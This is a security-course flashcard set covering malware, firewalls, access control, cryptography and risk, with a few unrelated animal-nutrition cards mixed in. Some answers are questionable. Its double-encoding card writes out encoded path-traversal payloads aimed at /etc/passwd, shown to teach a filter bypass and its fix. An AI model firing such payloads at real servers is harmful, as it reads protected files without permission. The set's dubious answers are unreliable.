Mid-Term help
d. OTP
All of the following can be broken mathematically EXCEPT____________. a. AES b. 3DES c. SHA d. OTP
Footprinting
Gathering information about the target: IP addresses, web presence, phone numbers, email addresses.
[6.2] In 2000 the Aust. Privacy Act 1988 was amended to include what?
National Privacy Principles
Security Controls
Defence mechanisms that protect all components of an information system, covering both physical access and communication.
TCP Intercepting Firewall
Firewall that sits between the server and the Internet. It completes the client's TCP handshake itself and only then opens a connection to the server, so half-open connections never reach the server.
triage
identifying incident, investigating severity, setting priorities on how to deal with incident
Indirect Calorimetry
measure oxygen consumption and carbon dioxide production calculate heat production
Tracert
"Mega ping": returns the route taken by packets to the host, discovered by sending probes with increasing TTL values.
block cipher
message divided into blocks of bits for encryption and decryption purposes
integrity
Preventing modification of information by unauthorised individuals or systems.
SYN Cookies
Prevents the server from reserving resources on the initial SYN: the connection state is encoded in the server's initial sequence number and is returned by the client in its ACK, so the server stores nothing until the handshake completes.
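The mechanism on this card, as an added illustration that is not part of the original notes. It is a simplified SYN cookie: the server derives its initial sequence number from an HMAC over the connection 4-tuple and a slowly changing counter, and on the final ACK it recomputes the value instead of looking up stored state. The secret, the counter scheme and the field layout are assumptions; real stacks such as Linux also pack the MSS and a timestamp into the number.

```python
# Added example (not from the original page): simplified SYN cookies.
# The server keeps no per-SYN state; the cookie travels with the client.
import hashlib
import hmac

SERVER_SECRET = b"rotate-me-periodically"   # assumed server-side secret


def syn_cookie(client_ip, client_port, server_ip, server_port, counter):
    """32-bit value the server sends as its initial sequence number (ISN)."""
    msg = f"{client_ip}:{client_port}:{server_ip}:{server_port}:{counter}".encode()
    mac = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(mac[:4], "big")


def validate_ack(client_ip, client_port, server_ip, server_port, ack_number, counter):
    """On the client's final ACK, recompute the cookie instead of looking up state.

    The client acknowledges ISN+1, so the cookie is ack_number-1 (mod 2^32).
    The current counter and the previous one are both accepted so a handshake
    that straddles a counter tick is not rejected.
    """
    expected = (ack_number - 1) & 0xFFFFFFFF
    for c in (counter, counter - 1):
        if syn_cookie(client_ip, client_port, server_ip, server_port, c) == expected:
            return True
    return False


if __name__ == "__main__":
    # Constructed sample handshake.
    isn = syn_cookie("10.0.0.5", 40000, "10.0.0.1", 80, counter=7)
    ack = (isn + 1) & 0xFFFFFFFF
    print("accepted:", validate_ack("10.0.0.5", 40000, "10.0.0.1", 80, ack, counter=7))
```

Because the ACK carries everything needed to rebuild the connection, a SYN flood only costs the server one HMAC per packet rather than a backlog entry per half-open connection.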
info security laws
seek to protect the civil rights of populations from abuses of info systems and the internet
Encrypted Virus
Virus writers encrypt the virus body; every replication uses a new key, so the body looks different each time. The decryption routine itself never changes, though, so that routine is what scanners can still signature.
Exploit
Code or technique that takes advantage of a vulnerability (a weakness or mistake in a program). Malware commonly carries one to gain execution.
NIS (Norton Internet Software) 2014
what is the best antivirus software?
Service Control Firewall Technique
Controls which types of Internet services can be accessed; filters by IP address and port number.
Social Engineering
A means of gathering information for an attack by relying on the weakness of an individual.
Common Network Scanner Tools:
- Solar Winds - Lanhelper
Security Technologies: - Types of IDS:
- HIDS - NIDS
TLS steps
1. Handshaking - the parties agree a master secret (exchanged or derived using asymmetric crypto). 2. Key derivation - the master secret is used to generate a set of session keys. 3. Data transfer - data is broken into records for transmission. 4. Connection closure - a special close message is sent to ensure a proper close (so a truncation cannot pass as a normal end).
Information Assets
A risk management strategy calls on information security professionals to know their organization's _____. Valuable or sensitive data is an "information asset". Examples: confidential information about employees; information about commercial contracts; production information of factories. Categorize information assets: highly valuable financially; sensitive but not financially valuable (reputation, political). Identification of assets should be relatively straightforward; valuation of assets is more of a challenge.
Macro
A series of instructions that can be grouped together as a single command, often used to automate a complex set of tasks or a repeated series of tasks.
Protocol
A set of rules governing the exchange of data between two or more entities.
Energy Values in Poultry
AME (apparent metabolizable energy) -GE of feed -fecal, urinary (gas is negligible) -If corrected for nitrogen retention = AMEn TME (true Metabolizable energy) -GE -excreta energy -Test ingredient substituted for ingredient of known ME or Subtract excreta energy in fasted birds
Rootkit
Admin access to system
Email address spoofing
Altering the sender information on an email to trick recipients into thinking the message is from another source.
Spidering
Automated mapping of a website or file system: a program that recursively follows every link in an HTML document. Can reveal old insecure pages, backups, connected databases, etc.
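The recursive link-following described above, as an added example that is not part of the original notes. The "site" is a constructed in-memory dictionary of paths standing in for HTTP responses, and the hostname target.example is made up; the point is that a page nobody links from the menu (here an old directory with a database dump beside it) is still found once every link is followed.

```python
# Added example (not from the original page): a minimal spider over a
# constructed in-memory site, showing how recursive link following surfaces
# forgotten content such as backups.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed fixture: path -> HTML body. No real host is contacted.
SITE = {
    "/": '<a href="/about">About</a> <a href="/old/index.html">old</a>',
    "/about": '<a href="/">Home</a> <a href="mailto:x@example.com">mail</a>',
    "/old/index.html": '<a href="backup.sql">dump</a> <a href="/">home</a>',
    "/old/backup.sql": "CREATE TABLE users (...)",
}


class LinkExtractor(HTMLParser):
    """Collect href targets from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def fetch(url):
    """Stand-in for an HTTP GET; serves the constructed fixture."""
    path = urlparse(url).path or "/"
    return SITE.get(path)


def spider(start):
    """Breadth-first crawl from `start`; returns the set of same-host URLs that resolved."""
    host = urlparse(start).netloc
    seen, queue, found = set(), [start], set()
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        body = fetch(url)
        if body is None:
            continue
        found.add(url)
        parser = LinkExtractor()
        parser.feed(body)
        for href in parser.links:
            target = urljoin(url, href)      # resolves relative links such as "backup.sql"
            parsed = urlparse(target)
            # Stay on the target host and ignore mailto:, javascript:, etc.
            if parsed.scheme in ("http", "https") and parsed.netloc == host:
                queue.append(target)
    return found


if __name__ == "__main__":
    for url in sorted(spider("http://target.example/")):
        print(url)
```

Against a real site the same loop would be rate-limited and scoped to an agreed target; the `seen` set is what keeps the crawl from looping on pages that link back to each other.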
[5.6] Briefly define biometric
Automated method of verifying the identity or recognising someone based on physiological or behavioural characteristic.
In order to recover or prevent virus attacks:
Avoid potentially unreliable websites/emails. System Restore. Re-install operating system. Use and maintain anti-virus software.
Firewall
Barrier between trusted and untrusted networks. prevents unauthorised traffic from reaching the network.
____ plans usually include all preparations for the recovery process, strategies to limit losses during the disaster, and detailed steps to follow when the smoke clears, the dust settles, or the floodwaters recede.
Disaster recovery (DR)
____________________ components account for the management of information in all its states: transmission, processing, and storage.
Data
[4.4] Policy enforcement phase. Why is the order of steps important?
It doesn't make sense to check whether a subject is authorised unless you are first satisfied that the request comes from the right subject: authenticate, then authorise.
Phishing carried out what.
Email, instant messaging
Removable storage is a software application that allows an organization to monitor and control business data on a personally owned device.
False
Risk evaluation assigns a risk rating or score to each information asset.
False
If everything above can go wrong
You need a recovery contingency plan/policy.
Salt
Random but not secret information, different for each user, mixed into the password before hashing so that identical passwords produce different hashes and precomputed tables are useless.
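The salt card in working form, as an added example that is not part of the original notes. It uses PBKDF2 from the Python standard library; the iteration count and the storage format "iterations$salt$hash" are assumptions chosen for illustration, and the salt is stored in the clear next to the hash because it is not a secret.

```python
# Added example (not from the original page): per-user random salt with PBKDF2.
import hashlib
import hmac
import os

ITERATIONS = 100_000        # assumed work factor; raise it for production hardware
SALT_BYTES = 16


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'iterations$salt_hex$hash_hex' for storage.

    A fresh random salt is drawn when none is supplied; the salt is stored
    alongside the hash and does not need to be kept secret.
    """
    salt = salt or os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_password_different_hashes(password: str) -> bool:
    """Two users choosing the same password get unrelated stored values."""
    return hash_password(password) != hash_password(password)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("login ok:", verify_password("correct horse battery staple", record))
    print("wrong pw:", verify_password("Tr0ub4dor&3", record))
```

The constant-time comparison matters less than the salt for offline cracking, but it is the habit to keep: a plain `==` on hex strings leaks how many leading bytes matched.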
[5.8] How can you reduce FNMR?
Reduce threshold.
Encryption (E)
Transforming the plaintext into another form so that the meaning is not obvious, using an algorithm and some secret knowledge
[1.2] Data state of Jeep Cherokee?
Transmission (initially) of information related to Uconnect.
Lipid Types
Triglycerides -Fatty acid chain length and unsaturation -Trans fatty acids • Essential fatty acids • Eicosanoids • -Biohydrogenation in the rumen -Conjugated Linoleic Acid (CLA) Phospholipids Steroids Fat Quality
Lipids
Triglycerides •Fatty acid chain length and unsaturation •Trans fatty acids Essential fatty acids •Eicosanoids -Biohydrogenation in the rumen -Conjugated Linoleic Acid (CLA) Phospholipids Steroids Fat Quality
Failing to prevent an attack all but invites an attack.
True
Using a secure logon and authentication process is one of the six steps used to prevent malware.
True
When the organization is pursuing an overall risk management program, it requires a(n) systematic report that enumerates the opportunities for controlling risk.
True
Which of these is a list of approved email senders?
Whitelist
full backup
All files on the computer are copied.
role based access control
Determines how subjects and objects interact based on the operations and tasks a user needs to carry out to fulfil their role's responsibilities.
Which of the following is NOT a motion detection method?
Moisture. (Motion detection methods: radio frequency, magnetism, infrared.)
motivation for hackers & types
theft, hijacking, cyber terrorism, "for fun" // types are white hat vs black hat authorized vs unauthorized
Stateful Firewall Filtering
Tracks TCP connections and only accepts packets that belong to an established connection. Drawbacks: needs more memory, does not inspect application-layer content, cannot by itself detect IP spoofing, and is easy to misconfigure.
Wireshark
traffic monitor. Capture messages moving through network card. Can save and filter sessions.
risk transfer
transfer risk to third party
What is Social engineering?
• This involves the psychological manipulation of people in order to establish a level of trust that leads to the individual taking action - Divulging sensitive and private information, initiating funds disbursement request, etc. • The most common form is "phishing."
What's the impact of Call Forwarding?
• Your phone is compromised, your conversations may be accessed, and your identity may be stolen. • In the end, our client's assets may be stolen because the fraudster requested and authorized a transaction.
Energy Outline
•Concept in Nutrition •Partitioning or Distribution •Species differences •Energy Density •Predicting the requirement -Body weight -Growth -Temperature / activity effects •Effect of energy on feed intake •Feed efficiency •Regulation of feed intake
Types of threats
Natural Events Human action - Deliberate: fraud, sabotage, theft - Accidental: negligence, errors, omissions
Risk measure defines the quantity and nature of risk that organizations are willing to accept as they evaluate the tradeoffs between perfect security and unlimited accessibility.
False
Spam is some act intended to deceive or trick the receiver, normally in email messages.
False
The anti-malware utility is one of the most popular backdoor tools in use today.
False
The first step in creating a comprehensive disaster recovery plan (DRP) is to document likely impact scenarios.
False
The main difference between a virus and a worm is that a virus does not need a host program to infect.
False
The term risk methodology refers to a list of identified risks that results from the risk-identification process.
False
Vishing is a type of wireless network attack.
False
Wardialers are becoming more frequently used given the rise of Voice over IP (VoIP).
False
Within best practices, the optimum standard is a subcategory of practices that are typically viewed as "the best of the best."
False
Within organizations, technical feasibility defines what can and cannot occur based on the consensus and relationships between the communities of interest.
False
You cannot use qualitative measures to rank values.
False
What compliance regulation applies specifically to the educational records maintained by schools about students?
Family Educational Rights and Privacy Act (FERPA)
Establishing a competitive business model, method, or technique enabled an organization to provide a product or service that was superior and created a(n) competitive advantage.
True
Information Security 3 sectors
Internet: Geotagging and Hacking E-commerce: Privacy and security issues Telecommunications: information leakage and metadata collection
Which statement about data loss prevention (DLP) is NOT true?
It can only protect data while it is on the user's personal computer
Energy Distribution, Partitioning, Utilization
Net Energy = NEm + NEp -Maintenance (NEm) •Heart rate (10%), kidney (7%), protein turnover (10%), CNS activity (15%), respiration (7%), liver (7%) •Ion balance (35%) -Production (NEp) •Tissue (muscle, fat) •Lactation, egg production •Pregnancy •Wool, hair, feathers •Work
Examples of exceptionally grave damage include armed hostilities against the United States or its allies and disruption of foreign relations vitally affecting the national security.
True
In a Bring Your Own Device (BYOD) policy, the user acceptance component may include separation of private data from business data.
True
Leaving unattended computers on is one of the top information security mistakes made by individuals.
True
One way to determine which information assets are critical is by evaluating how much of the organization's revenue depends on a particular asset.
True
Organizations should communicate with system users throughout the development of the security program, letting them know that changes are coming.
True
Policies are documents that specify an organization's approach to security.
True
Remote wiping is a device security control that allows an organization to remotely erase data or email in the event of loss or theft of the device.
True
Risk control is the application of controls to reduce the risks to an organization's data and information systems.
True
Rootkits are malicious software programs designed to be hidden from normal methods of detection.
True
Security efforts that seek to provide a superior level of performance in the protection of information are referred to as best business practices.
True
Some argue that it is virtually impossible to determine the true value of information and information-bearing assets.
True
Spyware gathers information about a user through an Internet connection, without his or her knowledge.
True
The Government Information Security Reform Act (Security Reform Act) of 2000 focuses on management and evaluation of the security of unclassified and national security systems.
True
The amount of money spent to protect an asset is based in part on the value of the asset.
True
The business impact analysis (BIA) identifies the resources for which a business continuity plan (BCP) is necessary.
True
The general management of an organization must structure the IT and information security functions to defend the organization's information assets.
True
The mitigate control strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation.
True
The most common of the mitigation procedures is the disaster recovery plan.
True
The recovery point objective (RPO) is the maximum amount of data loss that is acceptable.
True
The results from risk assessment activities can be delivered in a number of ways: a report on a systematic approach to risk control, a project-based risk assessment, or a topic-specific risk assessment.
True
The term risk management describes the process of identifying, assessing, prioritizing, and addressing risks.
True
The tools for conducting a risk analysis can include the documents that define, categorize, and rank risks.
True
The value of intellectual property influences asset valuation.
True
To determine if the risk is acceptable or not, you estimate the expected loss the organization will incur if the risk is exploited.
True
When determining the relative importance of each asset, refer to the organization's mission statement or statement of objectives to determine which elements are essential, which are supportive, and which are merely adjuncts.
True
You should adopt naming standards that do not convey information to potential system attackers.
True
Derivatives of Cholesterol
Vitamin D3 Glucocorticoids (cortisol, corticosterone) Mineralocorticoids Bile salts (cholic acid, taurocholic, glycocholic, etc) Estrogen Progesterone Testosterone
[3.1] Relationship btwn threats, vulnerabilities and attacks
Vulnerabilities can be deliberately exploited by threats, and this results in an attack on the information asset.
b. Diffie-Hellman (DH)
Which of the following key exchanges uses the same keys each time? a. Diffie-Hellman Ephemeral (DHE) b. Diffie-Hellman (DH) c. Diffie-Hellman-RSA (DHRSA) d. Elliptic Curve Diffie-Hellman (ECDH)
d. Hardware Security Module (HSM)
Which of these has an onboard key generator and key storage facility, as well as accelerated symmetric and asymmetric encryption, and can back up sensitive material in encrypted form? a. Trusted Platform Module (TPM) b. self-encrypting hard disk drives (HDDs) c. encrypted hardware-based USB drives d. Hardware Security Module (HSM)
a. risk loss
Which of these is NOT a basic security protection for information that cryptography can provide? a. risk loss b. integrity c. confidentiality d. authenticity
a. Collisions should be rare
Which of these is NOT a characteristic of a secure hash algorithm? a. Collisions should be rare b. The results of a hash function should not be reversible. c. The hash should always be the same fixed size d. A message cannot be produced from a predefined hash
a. Advanced Encryption Standard
Which of these is the strongest symmetric cryptographic algorithm? a. Advanced Encryption Standard b. Data Encryption Standard c. Triple Data Encryption Standard d. Rivest Cipher (RC) 1
c. integrity
Which protection is provided by hashing? a. authenticity b. confidentiality c. integrity d. availability
Which of the following is not designed to prevent individuals from entering sensitive areas but instead is intended to direct traffic flow.
barricade
black box
basic or no information is provided
PCs
BitLocker
smurf
broadcasting large number of ICMP packets with victim's spoofed source IP
A____ Can be used to secure a mobile device
cable lock
double encoding
Can be used to bypass many text-based security filters: the attacker encodes the '%' of an already-encoded character (e.g. %2e becomes %252e), so a filter that decodes once never sees the dangerous string. Defence: decode to a canonical form first, then filter dangerous characters, and re-encode at every boundary.
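The bypass and the defence from this card side by side, as an added example that is not part of the original notes. The filter, the blocklist and the sample paths are constructed for illustration; the naive filter decodes once and misses the double-encoded traversal, while the canonicalizing filter decodes until the string stops changing and then applies the same check.

```python
# Added example (not from the original page): single-decode filter bypassed by
# double encoding, and the "canonicalize, then filter" fix.
from urllib.parse import unquote

BLOCKED = ("../", "..\\", "<script")   # illustrative blocklist


def single_decode_filter(raw: str) -> bool:
    """Naive filter: decode once, reject known-bad substrings. True = allowed."""
    decoded = unquote(raw)
    return not any(bad in decoded.lower() for bad in BLOCKED)


def canonicalize(raw: str, max_rounds: int = 5) -> str:
    """Decode repeatedly until the value is stable; refuse absurd nesting."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            return current
        current = decoded
    raise ValueError("too many encoding layers; reject the request")


def canonical_filter(raw: str) -> bool:
    """Filter applied to the canonical (fully decoded) form. True = allowed."""
    try:
        decoded = canonicalize(raw)
    except ValueError:
        return False
    return not any(bad in decoded.lower() for bad in BLOCKED)


# Constructed request paths.
SINGLE = "%2e%2e%2f%2e%2e%2fetc%2fpasswd"                      # ../../etc/passwd once-encoded
DOUBLE = "%252e%252e%252f%252e%252e%252fetc%252fpasswd"        # '%' itself encoded as %25
BENIGN = "/images/logo.png"

if __name__ == "__main__":
    for label, path in (("single", SINGLE), ("double", DOUBLE), ("benign", BENIGN)):
        print(f"{label:7} naive={single_decode_filter(path)!s:5} "
              f"canonical={canonical_filter(path)}")
```

One decode of DOUBLE yields the still-encoded `%2e%2e%2f...`, which contains no literal `../`, so the naive filter lets it through; whatever sits behind the filter then decodes it again and sees the traversal. The round limit in `canonicalize` is the practical caveat: decoding "until stable" must terminate, so treat an input that needs more than a few rounds as hostile.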
exposure
Of an information resource: the harm, loss or damage that can result if a threat compromises the resource.
mandatory access control
operating system constrains ability of subject to access or perform operation on an object
Boot Sector Virus
original virus. Sits on a boot sector and activated on boot.
discretionary access control
owner of resource specify which subjects can access specific resources
Attack Vectors
parts of the application that can be reached by users. All attack vectors form the attack surface
object
passive entity that contains information or needed functionality
deterrent control
discourage potential attacker
network usage policy
document, agreement, or contract that defines acceptable and unacceptable uses of computer and network resources for a business or organization
redundancy
duplication of critical components/functions of system with intention of increasing reliability and availability of system
digital certificate
electronic document used to prove ownership of public key
For hardware devices, the ____________________ number is used by the network operating system to identify a specific network device.
electronic serial, MAC address, or hardware address
Network Security
Is concerned with addressing vulnerabilities and threats in computer networks, whether or not they are connected to the Internet: as long as there is a network connection there is an increased risk of unauthorized access. The primary challenge in securing a computer network is keeping user data private and accessible only to authorized persons.
Malware
Is short for "malicious software" and includes any software designed to damage, corrupt, or illegally manipulate computer resources. Common forms include viruses, worms, and spyware.
exposure factor
percentage loss by realised threat
A typical configuration baseline would include each of the following Except.
Performing a security risk assessment
Which of the following is NOT a characteristic of an alarmed carrier PDS?
periodic visual inspections
demilitarised zone
physical or logical subnetwork that contains and exposes organisation's external facing services to a larger and untrusted network
communication controls
Network controls that secure the movement of data across networks: firewalls, anti-malware, white/black listing, encryption, VPNs, transport layer security, employee monitoring systems.
firewall
network hardware or software that examines data packets flowing in and sometimes out of a network or computer in order to filter out packets that are potentially dangerous
interior threats
network security threats that originate from within a network, typically from registered users
RATs (remote administration tool)
obtained through small files like online greeting cards, games, or free software what can they do? -log keystrokes -capture voice conversations -capture web camera -hijack computers
Which of the following is NOT an activity phase control
Resource control. (Activity phase controls: compensating control, detective control, deterrent control.)
data custodian
responsible for maintaining and protecting data
data owner
responsible for protection and use of information
ransomware
restricts access to computer system until ransom is paid
firewall
restricts access to one network from another network
recovery control
return environment back to regular operation
security awareness training
Teaches the knowledge and attitude members of an organisation should possess regarding protection of the organisation's physical and information assets.
risk avoidance
terminating activity introducing the risk
Ping
test connection between hosts. Sends "are you there?" messages
War driving
the act of driving through neighborhoods with a wireless notebook or handheld computer looking for unsecured Wi-Fi networks
identification
mapping an unknown entity to a known identity as to make it known
hash
mapping of data of arbitrary length to data of fixed length
cipher (algorithm)
mathematical and logic rules used in cryptographic functions
steganography
Method of hiding data in another media type to conceal its existence.
data-entry errors
mishandling of computer output
asset value
monetary value of asset
wiretapping
monitoring telephone and Internet conversation by a third party, by covert means
antivirus
software used to prevent, detect and remove malicious computer viruses
Software Patch
sometimes called a security patch, fixes software bugs and flaws and is typically distributed to software users through online software updates
worm
standalone malware that replicates itself and spreads to other computers
code review
Systematic examination of source code.
Which of the following cannot be used along with fencing as a security perimeter?
Vapor barrier
[5.6] Which is faster at returning results, verification mode or identification mode? (biometrics)
Verification is faster. It only requires a 1-to-1 comparison against the claimed identity's template. Identification has to search the entire database (a 1-to-n comparison).
Entity Authentication
Verify claimed identity.
Data Origin Authentication
Verify source and integrity of message.
Authentication
Verifying a claimed identity or source of information.
Essential Fatty Acid Deficiency
Very Rare Difficult to induce on common diets Most common deficiency symptom is dermatitis or other skin problems. Benefits of increasing omega-3 over omega-6
What's the impact of phishing?
Victims of phishing may have malware installed on their computer systems or have their identity stolen.
vulnerability
weakness in design, implementation, operation or internal control of process that could expose system
log key strokes, capture voice conversations, capture web camera video sessions, hijack computers
what can RATs do?
in situations where the info being stored is confidential or valuable, and there is a possibility that your computer can be accessed by others
when is encryption useful?
Footprinting Tools
who.is, nslookup, social engineering
Code injection via Stack Smash
Overflow a stack buffer so that the saved return address is overwritten; when the function returns, control transfers to the attacker's payload instead of the caller.
HTTP Flood
Zombies issue large volumes of HTTP requests, for example following every link on the site recursively. The target consumes CPU, memory and bandwidth responding to the zombies and has nothing left for legitimate clients.
Spyware
§ A broad category of software designed to intercept or take partial control of a computer's operation without the informed consent of that machine's owner or legitimate user § In simpler terms, spyware is a type of program that watches what users do with their computer and then sends that information over the internet § Spyware can collect many different types of information about a user: • Records the types of websites a user visits • Records what is typed by the user to intercept passwords or credit card numbers • Used to launch "pop up" advertisements § Many legitimate companies incorporate forms of spyware into their software for purposes of advertisement(Adware)
What does Malware look like?
§ Hostile, intrusive, or damaging software or program code ("malicious" + "software") • Examples of malware include viruses, worms, Trojan horses, ransomware, and spyware.
Nessus
- The Most Widely Used Vulnerability Scanner - A Commercial Tool that has Tens of Thousands of Documented Vulnerabilities in its Library - Works on: Linux, Windows, Routers
Other Security Technologies: - Data Loss Prevention (DLP)
- Monitor Outgoing Network Traffic to look for Key Files going out - It can also Monitor Data Storage of Sensitive Documents to Log when Data is Accessed
Troubleshooting Common Security Issues: - Common Configuration Issues (Filtering)
- Most Access Points offer some Level of Filtering - It should be Turned on and Configured
Steganography
- NOT cryptography - Used to hide information within a document or image so the presence of the message is not detected. - Some techniques make use of crypto
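The two steganography cards (the definition above and this one) in working form, as an added example that is not part of the original notes. It hides a message in the least-significant bits of a byte array that stands in for image samples; the cover data, the 32-bit length prefix and the bit order are assumptions chosen for illustration. The message is recovered exactly, and no sample changes by more than 1, which is why the presence of the message is not visible in the cover.

```python
# Added example (not from the original page): least-significant-bit (LSB)
# steganography over a constructed byte array standing in for image samples.


def embed(cover: bytes, message: bytes) -> bytes:
    """Write each message bit into the LSB of successive cover bytes.

    A 32-bit big-endian length prefix tells the extractor where to stop.
    """
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for message")
    out = bytearray(cover)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit      # clear LSB, then set it to the message bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read LSBs back; the first 32 bits give the message length."""

    def read_bytes(start: int, count: int) -> bytes:
        value = bytearray()
        for n in range(count):
            byte = 0
            for k in range(8):
                byte = (byte << 1) | (stego[start + n * 8 + k] & 1)
            value.append(byte)
        return bytes(value)

    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def max_sample_change(cover: bytes, stego: bytes) -> int:
    """Largest per-sample difference introduced by embedding (expected: 1)."""
    return max(abs(a - b) for a, b in zip(cover, stego))


COVER = bytes(range(256)) * 16      # constructed stand-in for 4096 image samples

if __name__ == "__main__":
    secret = b"meet at dawn"
    stego = embed(COVER, secret)
    print("recovered:", extract(stego))
    print("max sample change:", max_sample_change(COVER, stego))
```

This is concealment, not confidentiality: anyone who reads the LSBs gets the message, which is the card's point that steganography is not cryptography. Encrypting the message before embedding (the "some techniques make use of crypto" case) protects the content even after the hiding is detected.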
[4.3] Describe what is meant by need to know principle and separation of duties.
- Need to know = access restricted to those who need to know information to complete job. - Separation = break tasks into multiple components, each performed by different entity.
RATs
(Remote Administration Tool) obtained through small files like online greeting cards, games, or free software
Rootkit
* Upon penetrating a computer, a hacker may install a collection of programs, called a rootkit. * May enable: - Easy access for the hacker (and others)into the enterprise - Keystroke logger * Eliminates evidence of break-in. * Modifies the operating system.
Adware
**Advertising-supported software is any software package which automatically plays, displays, or downloads advertising material to a computer after the software is installed on it or while the application is being used. **Adware is software integrated into or bundled with a program, typically as a way to recover programming development costs through advertising income
What's is Botnet
*A botnet is a number of compromised computers used to send spam or viruses, or to flood a network with messages as a denial-of-service attack. *The compromised computers are called zombies.
How do viruses work?
*A virus attaches itself to a program, file, or disk. *When the program is executed, the virus activates and replicates itself. *The virus may be benign or malignant but executes its payload at some point. -Viruses can cause computer crashes and loss of data.
RC4 Algorithm
- "Ron's Cipher #4" - Keystream generator for a binary additive stream cipher (ciphertext = plaintext XOR keystream) - Input: key of 1 to 256 bytes (8 to 2048 bits) - Output: pseudorandom byte sequence, produced 8 bits at a time - Only a few lines of code (~20) - Fast in software - Now considered broken and removed from TLS; study it, do not deploy it
Solar Winds
- A Commercial Network Scanner - Allow you to Select an IP Range, Subnet, or List of IP Addresses to scan and then start the scan - Will Produce a Map of your Network
Tcpdump
- A Common Packet Sniffer for Linux - Works from the Shell and is Relatively Easy to Use
Kerberos: - Basic Information
- Network Authentication Protocol - Developed at MIT in the mid 1980s - Available as Open Source or in Supported Commercial Software
Types of Authentication: - Federations
- A Federation is a Collection of Computer Networks that Agree on Standards of Operation, such as Security Standards - For Example, Instant Messaging Federation (IM): 1. Multiple IM Providers form Common Communication Standards, thus allowing Users on Different Platforms with Different Clients to Communicate Freely. This would Facilitate Communication between Employees in each of the Various Partners - Other Example, Microsoft Passport or Google Checkout: 1. Allows a User to have a Single Identity that they can use across Different Business Units and perhaps even Entirely Different Businesses
Wireshark
- Network Packet Sniffer - Penetration Testers use it Regularly - Provides a Convenient Graphical User Interface
Example of Denial of Receipt
- A customer orders an expensive product, but the vendor demands payment before shipment. - The customer pays, and the vendor ships the product. - The customer then asks the vendor when he will receive the product. - If the customer has already received the product, the question constitutes a denial of receipt attack. - The vendor can defend against this attack only by proving that the customer did, despite his denials, receive the product.
Example of Repudiation of origin
- A customer sends a letter to a vendor agreeing to pay a large amount of money for a product. - The vendor ships the product and then demands payment. - The customer denies having ordered the product - The customer has repudiated the origin of the letter. - If the vendor cannot prove that the letter came from the customer, the attack succeeds.
Mechanisms/Countermeasures
- A security mechanism is a method, tool, or procedure for enforcing a security policy. - Supporting mechanisms are assumed to be working correctly. - What concrete actions should we take under an attack, or to withstand threats?
policy
- A security policy is a statement of what is, and what is not, allowed. - This defines 'security' for the site/system/computer/data/information, etc. - It is about imposing rules to reduce risks to assets to an acceptable level. - A security policy is a specification of what security requirements/goals the countermeasures are intended to achieve. - "Perfect security" is not necessary, is costly, and may not even be possible. - Secure against what, from whom, and when? - Unambiguously partition system states. - Correctly capture security requirements. - Composition of policies: if policies conflict, the discrepancies may create security vulnerabilities.
ARP (Address Resolution Protocol)
- ARP Protocol Maps IP Addresses to MAC Addresses
[3.3] What sort of information is included in AusCERT security bulletin?
- ASB or ESB (AusCERT or External) - ID number - [tag] with affected systems - Product name - Most severe impact if exploited.
Troubleshooting Common Security Issues
- Access Issues - Configuration Issues - Personnel Issues - Other Issues
Troubleshooting Common Security Issues: - Common Configuration Issues (Logging)
- Access Points typically offer Logging that must be Turned on and Configured
Benefit of combining MAC and DAC?
- No owner can make sensitive info available to unauthorised users - 'Need to know' can be applied to limit access that would otherwise be granted under mandatory rules
Processes need to consider
- Access control and privilege management - Backup of files & systems - Business continuity plans - Communications - Checks and balances - Processes for staff leaving/joining - Software management processes and auditing
Principle of least privilege
- Access is restricted to the minimum resources and authorisations required for an entity to perform its day-to-day function. - Intended to limit the level of damage if a security incident occurs.
netcat
- Not Part of OS - Free Download for Windows/Linux - Allows you to Read and Write to Network Connections using either TCP or UDP
nc mymail.server.net 25
- Open a Connection to a Mail Server on Port 25
Assets: Functionality, Information, Risks, Security ( One of the goals of security is about regulating access to assets)
- Access to information, or - Access to functionality. • A computer system provides two assets: functionality and information - Compute GPA (functionality) - GPA (information) • Functionality comes with certain risks - What are the risks of computing GPA? • Intentional incorrect computing of GPA • Information also has risks - Privacy • GPA leakage - Integrity of GPA • Modification of GPA • Security is about identifying, managing, and minimizing risks.
Social Engineering
- Active attack: uses social skills to convince people to reveal information or permit access to resources.
Vulnerability Scanners can be Classified as Either:
- Active or - Passive
Protocol Analyzer (Packet Sniffer)
- Allows us to View Traffic and Capture a Copy of the Traffic for Offline Analysis - Helps with Incident Response and Network Forensics
Digital Signature Algorithm (DSA)
- Also called Digital Signature Standard (DSS) - Based on discrete log problem
Other Security Technologies: - Unified Threat Management System (UTM)
- Also called USM (Unified Security Management) System - Includes Combinations of all the other Devices: 1. Firewall, IDS, and Antivirus, as well as other Items, such as Load Balancing and VPN 2. A Single Place to Review Logs rather than having to Check Multiple Devices and System Logs
LanHelper
- An Inexpensive Network Mapper - You can Issue Statements Like: Scan Lan Scan IP Scan Workgroups
Wireless Scanners and Crackers
- The Network Scanners Mentioned above can be used for Wireless Networks, but There are also Tools specifically designed for WiFi that you can use - A Common WiFi Tool is Aircrack
Four Pillars of Information Security
-firewall -installing software patches -using security software -practicing safe cautious online behavior
attack
